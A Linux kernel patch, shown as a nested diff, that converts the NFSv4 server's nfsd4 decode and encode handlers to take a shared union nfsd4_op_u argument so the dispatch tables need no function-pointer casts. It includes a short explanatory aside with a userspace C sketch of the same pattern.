+ nfsd4_decode_layoutreturn(struct nfsd4_compoundargs *argp,
+-		struct nfsd4_layoutreturn *lrp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutreturn *lrp = &u->layoutreturn;
+ 	memset(lrp, 0, sizeof(*lrp));
+ 	if (xdr_stream_decode_bool(argp->xdr, &lrp->lr_reclaim) < 0)
+ 		return nfserr_bad_xdr;
+@@ -1795,8 +1838,9 @@ nfsd4_decode_layoutreturn(struct nfsd4_compoundargs *argp,
+ #endif /* CONFIG_NFSD_PNFS */
+ 
+ static __be32 nfsd4_decode_secinfo_no_name(struct nfsd4_compoundargs *argp,
+-					   struct nfsd4_secinfo_no_name *sin)
++					   union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo_no_name *sin = &u->secinfo_no_name;
+ 	if (xdr_stream_decode_u32(argp->xdr, &sin->sin_style) < 0)
+ 		return nfserr_bad_xdr;
+ 
+@@ -1806,8 +1850,9 @@ static __be32 nfsd4_decode_secinfo_no_name(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_sequence(struct nfsd4_compoundargs *argp,
+-		      struct nfsd4_sequence *seq)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_sequence *seq = &u->sequence;
+ 	__be32 *p, status;
+ 
+ 	status = nfsd4_decode_sessionid4(argp, &seq->sessionid);
+@@ -1826,8 +1871,10 @@ nfsd4_decode_sequence(struct nfsd4_compoundargs *argp,
+ }
+ 
+ static __be32
+-nfsd4_decode_test_stateid(struct nfsd4_compoundargs *argp, struct nfsd4_test_stateid *test_stateid)
++nfsd4_decode_test_stateid(struct nfsd4_compoundargs *argp,
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_test_stateid *test_stateid = &u->test_stateid;
+ 	struct nfsd4_test_stateid_id *stateid;
+ 	__be32 status;
+ 	u32 i;
+@@ -1852,14 +1899,16 @@ nfsd4_decode_test_stateid(struct nfsd4_compoundargs *argp, struct nfsd4_test_sta
+ }
+ 
+ static __be32 nfsd4_decode_destroy_clientid(struct nfsd4_compoundargs *argp,
+-					    struct nfsd4_destroy_clientid *dc)
++					    union nfsd4_op_u *u)
+ {
++	struct nfsd4_destroy_clientid *dc = &u->destroy_clientid;
+ 	return nfsd4_decode_clientid4(argp, &dc->clientid);
+ }
+ 
+ static __be32 nfsd4_decode_reclaim_complete(struct nfsd4_compoundargs *argp,
+-					    struct nfsd4_reclaim_complete *rc)
++					    union nfsd4_op_u *u)
+ {
++	struct nfsd4_reclaim_complete *rc = &u->reclaim_complete;
+ 	if (xdr_stream_decode_bool(argp->xdr, &rc->rca_one_fs) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfs_ok;
+@@ -1867,8 +1916,9 @@ static __be32 nfsd4_decode_reclaim_complete(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_fallocate(struct nfsd4_compoundargs *argp,
+-		       struct nfsd4_fallocate *fallocate)
++		       union nfsd4_op_u *u)
+ {
++	struct nfsd4_fallocate *fallocate = &u->allocate;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &fallocate->falloc_stateid);
+@@ -1924,8 +1974,9 @@ static __be32 nfsd4_decode_nl4_server(struct nfsd4_compoundargs *argp,
+ }
+ 
+ static __be32
+-nfsd4_decode_copy(struct nfsd4_compoundargs *argp, struct nfsd4_copy *copy)
++nfsd4_decode_copy(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy *copy = &u->copy;
+ 	u32 consecutive, i, count, sync;
+ 	struct nl4_server *ns_dummy;
+ 	__be32 status;
+@@ -1982,8 +2033,9 @@ nfsd4_decode_copy(struct nfsd4_compoundargs *argp, struct nfsd4_copy *copy)
+ 
+ static __be32
+ nfsd4_decode_copy_notify(struct nfsd4_compoundargs *argp,
+-			 struct nfsd4_copy_notify *cn)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy_notify *cn = &u->copy_notify;
+ 	__be32 status;
+ 
+ 	memset(cn, 0, sizeof(*cn));
+@@ -2002,16 +2054,18 @@ nfsd4_decode_copy_notify(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_offload_status(struct nfsd4_compoundargs *argp,
+-			    struct nfsd4_offload_status *os)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_offload_status *os = &u->offload_status;
+ 	os->count = 0;
+ 	os->status = 0;
+ 	return nfsd4_decode_stateid4(argp, &os->stateid);
+ }
+ 
+ static __be32
+-nfsd4_decode_seek(struct nfsd4_compoundargs *argp, struct nfsd4_seek *seek)
++nfsd4_decode_seek(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_seek *seek = &u->seek;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &seek->seek_stateid);
+@@ -2028,8 +2082,9 @@ nfsd4_decode_seek(struct nfsd4_compoundargs *argp, struct nfsd4_seek *seek)
+ }
+ 
+ static __be32
+-nfsd4_decode_clone(struct nfsd4_compoundargs *argp, struct nfsd4_clone *clone)
++nfsd4_decode_clone(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_clone *clone = &u->clone;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &clone->cl_src_stateid);
+@@ -2154,8 +2209,9 @@ nfsd4_decode_xattr_name(struct nfsd4_compoundargs *argp, char **namep)
+  */
+ static __be32
+ nfsd4_decode_getxattr(struct nfsd4_compoundargs *argp,
+-		      struct nfsd4_getxattr *getxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_getxattr *getxattr = &u->getxattr;
+ 	__be32 status;
+ 	u32 maxcount;
+ 
+@@ -2173,8 +2229,9 @@ nfsd4_decode_getxattr(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_setxattr(struct nfsd4_compoundargs *argp,
+-		      struct nfsd4_setxattr *setxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_setxattr *setxattr = &u->setxattr;
+ 	u32 flags, maxcount, size;
+ 	__be32 status;
+ 
+@@ -2214,8 +2271,9 @@ nfsd4_decode_setxattr(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_listxattrs(struct nfsd4_compoundargs *argp,
+-			struct nfsd4_listxattrs *listxattrs)
++			union nfsd4_op_u *u)
+ {
++	struct nfsd4_listxattrs *listxattrs = &u->listxattrs;
+ 	u32 maxcount;
+ 
+ 	memset(listxattrs, 0, sizeof(*listxattrs));
+@@ -2245,113 +2303,114 @@ nfsd4_decode_listxattrs(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_removexattr(struct nfsd4_compoundargs *argp,
+-			 struct nfsd4_removexattr *removexattr)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_removexattr *removexattr = &u->removexattr;
+ 	memset(removexattr, 0, sizeof(*removexattr));
+ 	return nfsd4_decode_xattr_name(argp, &removexattr->rmxa_name);
+ }
+ 
+ static __be32
+-nfsd4_decode_noop(struct nfsd4_compoundargs *argp, void *p)
++nfsd4_decode_noop(struct nfsd4_compoundargs *argp, union nfsd4_op_u *p)
+ {
+ 	return nfs_ok;
+ }
+ 
+ static __be32
+-nfsd4_decode_notsupp(struct nfsd4_compoundargs *argp, void *p)
++nfsd4_decode_notsupp(struct nfsd4_compoundargs *argp, union nfsd4_op_u *p)
+ {
+ 	return nfserr_notsupp;
+ }
+ 
+-typedef __be32(*nfsd4_dec)(struct nfsd4_compoundargs *argp, void *);
++typedef __be32(*nfsd4_dec)(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u);
+ 
+ static const nfsd4_dec nfsd4_dec_ops[] = {
+-	[OP_ACCESS]		= (nfsd4_dec)nfsd4_decode_access,
+-	[OP_CLOSE]		= (nfsd4_dec)nfsd4_decode_close,
+-	[OP_COMMIT]		= (nfsd4_dec)nfsd4_decode_commit,
+-	[OP_CREATE]		= (nfsd4_dec)nfsd4_decode_create,
+-	[OP_DELEGPURGE]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_DELEGRETURN]	= (nfsd4_dec)nfsd4_decode_delegreturn,
+-	[OP_GETATTR]		= (nfsd4_dec)nfsd4_decode_getattr,
+-	[OP_GETFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_LINK]		= (nfsd4_dec)nfsd4_decode_link,
+-	[OP_LOCK]		= (nfsd4_dec)nfsd4_decode_lock,
+-	[OP_LOCKT]		= (nfsd4_dec)nfsd4_decode_lockt,
+-	[OP_LOCKU]		= (nfsd4_dec)nfsd4_decode_locku,
+-	[OP_LOOKUP]		= (nfsd4_dec)nfsd4_decode_lookup,
+-	[OP_LOOKUPP]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_NVERIFY]		= (nfsd4_dec)nfsd4_decode_verify,
+-	[OP_OPEN]		= (nfsd4_dec)nfsd4_decode_open,
+-	[OP_OPENATTR]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_OPEN_CONFIRM]	= (nfsd4_dec)nfsd4_decode_open_confirm,
+-	[OP_OPEN_DOWNGRADE]	= (nfsd4_dec)nfsd4_decode_open_downgrade,
+-	[OP_PUTFH]		= (nfsd4_dec)nfsd4_decode_putfh,
+-	[OP_PUTPUBFH]		= (nfsd4_dec)nfsd4_decode_putpubfh,
+-	[OP_PUTROOTFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_READ]		= (nfsd4_dec)nfsd4_decode_read,
+-	[OP_READDIR]		= (nfsd4_dec)nfsd4_decode_readdir,
+-	[OP_READLINK]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_REMOVE]		= (nfsd4_dec)nfsd4_decode_remove,
+-	[OP_RENAME]		= (nfsd4_dec)nfsd4_decode_rename,
+-	[OP_RENEW]		= (nfsd4_dec)nfsd4_decode_renew,
+-	[OP_RESTOREFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_SAVEFH]		= (nfsd4_dec)nfsd4_decode_noop,
+-	[OP_SECINFO]		= (nfsd4_dec)nfsd4_decode_secinfo,
+-	[OP_SETATTR]		= (nfsd4_dec)nfsd4_decode_setattr,
+-	[OP_SETCLIENTID]	= (nfsd4_dec)nfsd4_decode_setclientid,
+-	[OP_SETCLIENTID_CONFIRM] = (nfsd4_dec)nfsd4_decode_setclientid_confirm,
+-	[OP_VERIFY]		= (nfsd4_dec)nfsd4_decode_verify,
+-	[OP_WRITE]		= (nfsd4_dec)nfsd4_decode_write,
+-	[OP_RELEASE_LOCKOWNER]	= (nfsd4_dec)nfsd4_decode_release_lockowner,
++	[OP_ACCESS]		= nfsd4_decode_access,
++	[OP_CLOSE]		= nfsd4_decode_close,
++	[OP_COMMIT]		= nfsd4_decode_commit,
++	[OP_CREATE]		= nfsd4_decode_create,
++	[OP_DELEGPURGE]		= nfsd4_decode_notsupp,
++	[OP_DELEGRETURN]	= nfsd4_decode_delegreturn,
++	[OP_GETATTR]		= nfsd4_decode_getattr,
++	[OP_GETFH]		= nfsd4_decode_noop,
++	[OP_LINK]		= nfsd4_decode_link,
++	[OP_LOCK]		= nfsd4_decode_lock,
++	[OP_LOCKT]		= nfsd4_decode_lockt,
++	[OP_LOCKU]		= nfsd4_decode_locku,
++	[OP_LOOKUP]		= nfsd4_decode_lookup,
++	[OP_LOOKUPP]		= nfsd4_decode_noop,
++	[OP_NVERIFY]		= nfsd4_decode_verify,
++	[OP_OPEN]		= nfsd4_decode_open,
++	[OP_OPENATTR]		= nfsd4_decode_notsupp,
++	[OP_OPEN_CONFIRM]	= nfsd4_decode_open_confirm,
++	[OP_OPEN_DOWNGRADE]	= nfsd4_decode_open_downgrade,
++	[OP_PUTFH]		= nfsd4_decode_putfh,
++	[OP_PUTPUBFH]		= nfsd4_decode_putpubfh,
++	[OP_PUTROOTFH]		= nfsd4_decode_noop,
++	[OP_READ]		= nfsd4_decode_read,
++	[OP_READDIR]		= nfsd4_decode_readdir,
++	[OP_READLINK]		= nfsd4_decode_noop,
++	[OP_REMOVE]		= nfsd4_decode_remove,
++	[OP_RENAME]		= nfsd4_decode_rename,
++	[OP_RENEW]		= nfsd4_decode_renew,
++	[OP_RESTOREFH]		= nfsd4_decode_noop,
++	[OP_SAVEFH]		= nfsd4_decode_noop,
++	[OP_SECINFO]		= nfsd4_decode_secinfo,
++	[OP_SETATTR]		= nfsd4_decode_setattr,
++	[OP_SETCLIENTID]	= nfsd4_decode_setclientid,
++	[OP_SETCLIENTID_CONFIRM] = nfsd4_decode_setclientid_confirm,
++	[OP_VERIFY]		= nfsd4_decode_verify,
++	[OP_WRITE]		= nfsd4_decode_write,
++	[OP_RELEASE_LOCKOWNER]	= nfsd4_decode_release_lockowner,
+ 
+ 	/* new operations for NFSv4.1 */
+-	[OP_BACKCHANNEL_CTL]	= (nfsd4_dec)nfsd4_decode_backchannel_ctl,
+-	[OP_BIND_CONN_TO_SESSION]= (nfsd4_dec)nfsd4_decode_bind_conn_to_session,
+-	[OP_EXCHANGE_ID]	= (nfsd4_dec)nfsd4_decode_exchange_id,
+-	[OP_CREATE_SESSION]	= (nfsd4_dec)nfsd4_decode_create_session,
+-	[OP_DESTROY_SESSION]	= (nfsd4_dec)nfsd4_decode_destroy_session,
+-	[OP_FREE_STATEID]	= (nfsd4_dec)nfsd4_decode_free_stateid,
+-	[OP_GET_DIR_DELEGATION]	= (nfsd4_dec)nfsd4_decode_notsupp,
++	[OP_BACKCHANNEL_CTL]	= nfsd4_decode_backchannel_ctl,
++	[OP_BIND_CONN_TO_SESSION] = nfsd4_decode_bind_conn_to_session,
++	[OP_EXCHANGE_ID]	= nfsd4_decode_exchange_id,
++	[OP_CREATE_SESSION]	= nfsd4_decode_create_session,
++	[OP_DESTROY_SESSION]	= nfsd4_decode_destroy_session,
++	[OP_FREE_STATEID]	= nfsd4_decode_free_stateid,
++	[OP_GET_DIR_DELEGATION]	= nfsd4_decode_notsupp,
+ #ifdef CONFIG_NFSD_PNFS
+-	[OP_GETDEVICEINFO]	= (nfsd4_dec)nfsd4_decode_getdeviceinfo,
+-	[OP_GETDEVICELIST]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_dec)nfsd4_decode_layoutcommit,
+-	[OP_LAYOUTGET]		= (nfsd4_dec)nfsd4_decode_layoutget,
+-	[OP_LAYOUTRETURN]	= (nfsd4_dec)nfsd4_decode_layoutreturn,
++	[OP_GETDEVICEINFO]	= nfsd4_decode_getdeviceinfo,
++	[OP_GETDEVICELIST]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTCOMMIT]	= nfsd4_decode_layoutcommit,
++	[OP_LAYOUTGET]		= nfsd4_decode_layoutget,
++	[OP_LAYOUTRETURN]	= nfsd4_decode_layoutreturn,
+ #else
+-	[OP_GETDEVICEINFO]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_GETDEVICELIST]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTGET]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTRETURN]	= (nfsd4_dec)nfsd4_decode_notsupp,
++	[OP_GETDEVICEINFO]	= nfsd4_decode_notsupp,
++	[OP_GETDEVICELIST]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTCOMMIT]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTGET]		= nfsd4_decode_notsupp,
++	[OP_LAYOUTRETURN]	= nfsd4_decode_notsupp,
+ #endif
+-	[OP_SECINFO_NO_NAME]	= (nfsd4_dec)nfsd4_decode_secinfo_no_name,
+-	[OP_SEQUENCE]		= (nfsd4_dec)nfsd4_decode_sequence,
+-	[OP_SET_SSV]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_TEST_STATEID]	= (nfsd4_dec)nfsd4_decode_test_stateid,
+-	[OP_WANT_DELEGATION]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_DESTROY_CLIENTID]	= (nfsd4_dec)nfsd4_decode_destroy_clientid,
+-	[OP_RECLAIM_COMPLETE]	= (nfsd4_dec)nfsd4_decode_reclaim_complete,
++	[OP_SECINFO_NO_NAME]	= nfsd4_decode_secinfo_no_name,
++	[OP_SEQUENCE]		= nfsd4_decode_sequence,
++	[OP_SET_SSV]		= nfsd4_decode_notsupp,
++	[OP_TEST_STATEID]	= nfsd4_decode_test_stateid,
++	[OP_WANT_DELEGATION]	= nfsd4_decode_notsupp,
++	[OP_DESTROY_CLIENTID]	= nfsd4_decode_destroy_clientid,
++	[OP_RECLAIM_COMPLETE]	= nfsd4_decode_reclaim_complete,
+ 
+ 	/* new operations for NFSv4.2 */
+-	[OP_ALLOCATE]		= (nfsd4_dec)nfsd4_decode_fallocate,
+-	[OP_COPY]		= (nfsd4_dec)nfsd4_decode_copy,
+-	[OP_COPY_NOTIFY]	= (nfsd4_dec)nfsd4_decode_copy_notify,
+-	[OP_DEALLOCATE]		= (nfsd4_dec)nfsd4_decode_fallocate,
+-	[OP_IO_ADVISE]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTERROR]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_LAYOUTSTATS]	= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_OFFLOAD_CANCEL]	= (nfsd4_dec)nfsd4_decode_offload_status,
+-	[OP_OFFLOAD_STATUS]	= (nfsd4_dec)nfsd4_decode_offload_status,
+-	[OP_READ_PLUS]		= (nfsd4_dec)nfsd4_decode_read,
+-	[OP_SEEK]		= (nfsd4_dec)nfsd4_decode_seek,
+-	[OP_WRITE_SAME]		= (nfsd4_dec)nfsd4_decode_notsupp,
+-	[OP_CLONE]		= (nfsd4_dec)nfsd4_decode_clone,
++	[OP_ALLOCATE]		= nfsd4_decode_fallocate,
++	[OP_COPY]		= nfsd4_decode_copy,
++	[OP_COPY_NOTIFY]	= nfsd4_decode_copy_notify,
++	[OP_DEALLOCATE]		= nfsd4_decode_fallocate,
++	[OP_IO_ADVISE]		= nfsd4_decode_notsupp,
++	[OP_LAYOUTERROR]	= nfsd4_decode_notsupp,
++	[OP_LAYOUTSTATS]	= nfsd4_decode_notsupp,
++	[OP_OFFLOAD_CANCEL]	= nfsd4_decode_offload_status,
++	[OP_OFFLOAD_STATUS]	= nfsd4_decode_offload_status,
++	[OP_READ_PLUS]		= nfsd4_decode_read,
++	[OP_SEEK]		= nfsd4_decode_seek,
++	[OP_WRITE_SAME]		= nfsd4_decode_notsupp,
++	[OP_CLONE]		= nfsd4_decode_clone,
+ 	/* RFC 8276 extended attributes operations */
+-	[OP_GETXATTR]		= (nfsd4_dec)nfsd4_decode_getxattr,
+-	[OP_SETXATTR]		= (nfsd4_dec)nfsd4_decode_setxattr,
+-	[OP_LISTXATTRS]		= (nfsd4_dec)nfsd4_decode_listxattrs,
+-	[OP_REMOVEXATTR]	= (nfsd4_dec)nfsd4_decode_removexattr,
++	[OP_GETXATTR]		= nfsd4_decode_getxattr,
++	[OP_SETXATTR]		= nfsd4_decode_setxattr,
++	[OP_LISTXATTRS]		= nfsd4_decode_listxattrs,
++	[OP_REMOVEXATTR]	= nfsd4_decode_removexattr,
+ };
+ 
+ static inline bool
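The conversions above (and the matching nfsd4_enc_ops changes further down) give every operation handler the same prototype by passing a union nfsd4_op_u pointer instead of a per-operation struct pointer, so the dispatch tables no longer need (nfsd4_dec) casts. Calling a function through an incompatible, cast pointer type is undefined behavior in C and defeats control-flow-integrity checking. A minimal userspace sketch of the pattern, with invented operation names:

#include <stdio.h>

/* Hypothetical per-operation argument types. */
struct op_read  { int fd; long offset; };
struct op_write { int fd; const char *buf; };

/* One union covers every operation's arguments... */
union op_u {
	struct op_read  read;
	struct op_write write;
};

/* ...so every handler can share the exact same prototype. */
typedef int (*op_handler)(union op_u *u);

static int handle_read(union op_u *u)
{
	struct op_read *read = &u->read;	/* pick out this op's member */
	printf("read fd=%d offset=%ld\n", read->fd, read->offset);
	return 0;
}

static int handle_write(union op_u *u)
{
	struct op_write *write = &u->write;
	printf("write fd=%d buf=%s\n", write->fd, write->buf);
	return 0;
}

/* No casts needed: each entry already has type op_handler. */
static const op_handler op_table[] = {
	handle_read,
	handle_write,
};

int main(void)
{
	union op_u u = { .read = { .fd = 3, .offset = 42 } };
	return op_table[0](&u);
}

Each handler's first statement selects its member out of the union, mirroring the "struct nfsd4_remove *remove = &u->remove;" lines added throughout the hunks above.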
+@@ -3643,8 +3702,10 @@ nfsd4_encode_stateid(struct xdr_stream *xdr, stateid_t *sid)
+ }
+ 
+ static __be32
+-nfsd4_encode_access(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_access *access)
++nfsd4_encode_access(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_access *access = &u->access;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3656,8 +3717,10 @@ nfsd4_encode_access(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ 	return 0;
+ }
+ 
+-static __be32 nfsd4_encode_bind_conn_to_session(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_bind_conn_to_session *bcts)
++static __be32 nfsd4_encode_bind_conn_to_session(struct nfsd4_compoundres *resp, __be32 nfserr,
++						union nfsd4_op_u *u)
+ {
++	struct nfsd4_bind_conn_to_session *bcts = &u->bind_conn_to_session;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3673,8 +3736,10 @@ static __be32 nfsd4_encode_bind_conn_to_session(struct nfsd4_compoundres *resp,
+ }
+ 
+ static __be32
+-nfsd4_encode_close(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_close *close)
++nfsd4_encode_close(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_close *close = &u->close;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &close->cl_stateid);
+@@ -3682,8 +3747,10 @@ nfsd4_encode_close(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_c
+ 
+ 
+ static __be32
+-nfsd4_encode_commit(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_commit *commit)
++nfsd4_encode_commit(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_commit *commit = &u->commit;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3696,8 +3763,10 @@ nfsd4_encode_commit(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ }
+ 
+ static __be32
+-nfsd4_encode_create(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_create *create)
++nfsd4_encode_create(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_create *create = &u->create;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3710,8 +3779,10 @@ nfsd4_encode_create(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ }
+ 
+ static __be32
+-nfsd4_encode_getattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_getattr *getattr)
++nfsd4_encode_getattr(struct nfsd4_compoundres *resp, __be32 nfserr,
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_getattr *getattr = &u->getattr;
+ 	struct svc_fh *fhp = getattr->ga_fhp;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+@@ -3720,8 +3791,10 @@ nfsd4_encode_getattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4
+ }
+ 
+ static __be32
+-nfsd4_encode_getfh(struct nfsd4_compoundres *resp, __be32 nfserr, struct svc_fh **fhpp)
++nfsd4_encode_getfh(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct svc_fh **fhpp = &u->getfh;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	struct svc_fh *fhp = *fhpp;
+ 	unsigned int len;
+@@ -3775,8 +3848,10 @@ nfsd4_encode_lock_denied(struct xdr_stream *xdr, struct nfsd4_lock_denied *ld)
+ }
+ 
+ static __be32
+-nfsd4_encode_lock(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_lock *lock)
++nfsd4_encode_lock(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_lock *lock = &u->lock;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	if (!nfserr)
+@@ -3788,8 +3863,10 @@ nfsd4_encode_lock(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_lo
+ }
+ 
+ static __be32
+-nfsd4_encode_lockt(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_lockt *lockt)
++nfsd4_encode_lockt(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_lockt *lockt = &u->lockt;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	if (nfserr == nfserr_denied)
+@@ -3798,8 +3875,10 @@ nfsd4_encode_lockt(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_l
+ }
+ 
+ static __be32
+-nfsd4_encode_locku(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_locku *locku)
++nfsd4_encode_locku(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_locku *locku = &u->locku;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &locku->lu_stateid);
+@@ -3807,8 +3886,10 @@ nfsd4_encode_locku(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_l
+ 
+ 
+ static __be32
+-nfsd4_encode_link(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_link *link)
++nfsd4_encode_link(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_link *link = &u->link;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3821,8 +3902,10 @@ nfsd4_encode_link(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_li
+ 
+ 
+ static __be32
+-nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_open *open)
++nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_open *open = &u->open;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3915,16 +3998,20 @@ nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_op
+ }
+ 
+ static __be32
+-nfsd4_encode_open_confirm(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_open_confirm *oc)
++nfsd4_encode_open_confirm(struct nfsd4_compoundres *resp, __be32 nfserr,
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_confirm *oc = &u->open_confirm;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &oc->oc_resp_stateid);
+ }
+ 
+ static __be32
+-nfsd4_encode_open_downgrade(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_open_downgrade *od)
++nfsd4_encode_open_downgrade(struct nfsd4_compoundres *resp, __be32 nfserr,
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_downgrade *od = &u->open_downgrade;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &od->od_stateid);
+@@ -4023,8 +4110,9 @@ static __be32 nfsd4_encode_readv(struct nfsd4_compoundres *resp,
+ 
+ static __be32
+ nfsd4_encode_read(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		  struct nfsd4_read *read)
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_read *read = &u->read;
+ 	bool splice_ok = test_bit(RQ_SPLICE_OK, &resp->rqstp->rq_flags);
+ 	unsigned long maxcount;
+ 	struct xdr_stream *xdr = resp->xdr;
+@@ -4065,8 +4153,10 @@ nfsd4_encode_read(struct nfsd4_compoundres *resp, __be32 nfserr,
+ }
+ 
+ static __be32
+-nfsd4_encode_readlink(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_readlink *readlink)
++nfsd4_encode_readlink(struct nfsd4_compoundres *resp, __be32 nfserr,
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_readlink *readlink = &u->readlink;
+ 	__be32 *p, *maxcount_p, zero = xdr_zero;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	int length_offset = xdr->buf->len;
+@@ -4110,8 +4200,10 @@ nfsd4_encode_readlink(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd
+ }
+ 
+ static __be32
+-nfsd4_encode_readdir(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_readdir *readdir)
++nfsd4_encode_readdir(struct nfsd4_compoundres *resp, __be32 nfserr,
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_readdir *readdir = &u->readdir;
+ 	int maxcount;
+ 	int bytes_left;
+ 	loff_t offset;
